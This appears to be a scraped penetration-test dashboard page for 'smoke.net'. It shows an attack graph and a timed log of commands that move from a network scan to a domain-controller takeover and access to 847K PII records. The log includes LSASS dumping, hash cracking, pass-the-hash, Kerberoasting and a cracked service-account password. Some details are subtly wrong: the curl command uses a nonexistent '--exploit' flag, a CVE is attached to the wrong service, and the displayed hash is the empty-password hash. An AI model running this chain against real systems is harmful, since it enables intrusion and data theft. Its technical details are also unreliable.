Back to Scan Results

Attack Path Analysis

Network penetration test — smoke.net — March 14, 2026

Attack Steps

8

Time to Compromise

31m 17s

Credentials Found

5

Data at Risk

847K

Attack Path Graph
100%
entry
host
service
credential
hash
target
Port ScanService EnumLSASS DumpLateral MovePass-the-HashKerberoastPivotCredential ReuseData AccessAttacker EntryExternal10.0.1.15web-proxy01CVE-2024-21762:8080Java RMI10.0.4.4:1099CVE-2023-44487:1099admin@SMOKE.NETNTLM Hash10.0.2.10dc01.smoke.netCVE-2024-26198:445svc_backupService Account10.0.3.50db-prod01 (SQL):1433PII Database847K records
08:00:00/08:31:17100%

Select a Node

Click any node in the attack path graph to view vulnerability details and mitigations.

Attack Summary
Attack Event Log
16 events
00:00$ nmap -sV -T4 10.0.0.0/16 --top-ports 1000
02:14Discovered 23 hosts with 67 open ports
04:22$ curl -H "PRI * HTTP/2.0" http://10.0.1.15:8080/ --exploit CVE-2024-21762
04:38RCE achieved on 10.0.1.15 — shell as www-data
07:15$ java -jar ysoserial.jar JRMPClient 10.0.4.4:1099
07:44Deserialization exploit successful — shell as root on srv01
10:02$ procdump -ma lsass.exe
12:41NTLM hash extracted: admin@SMOKE.NET — aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
14:55$ hashcat -m 1000 -a 0 hash.txt rockyou.txt -r best64.rule
18:33$ psexec.py SMOKE.NET/administrator@10.0.2.10
18:49Domain Controller dc01.smoke.net compromised — SYSTEM shell
22:08$ GetUserSPNs.py -request SMOKE.NET/administrator
22:31Kerberoast: svc_backup password cracked — "Backup2024!"
26:55$ mssqlclient.py svc_backup@10.0.3.50 -windows-auth
27:10SQL access granted — SA-equivalent privileges confirmed
31:17SELECT COUNT(*) FROM customers_pii — 847,291 rows accessible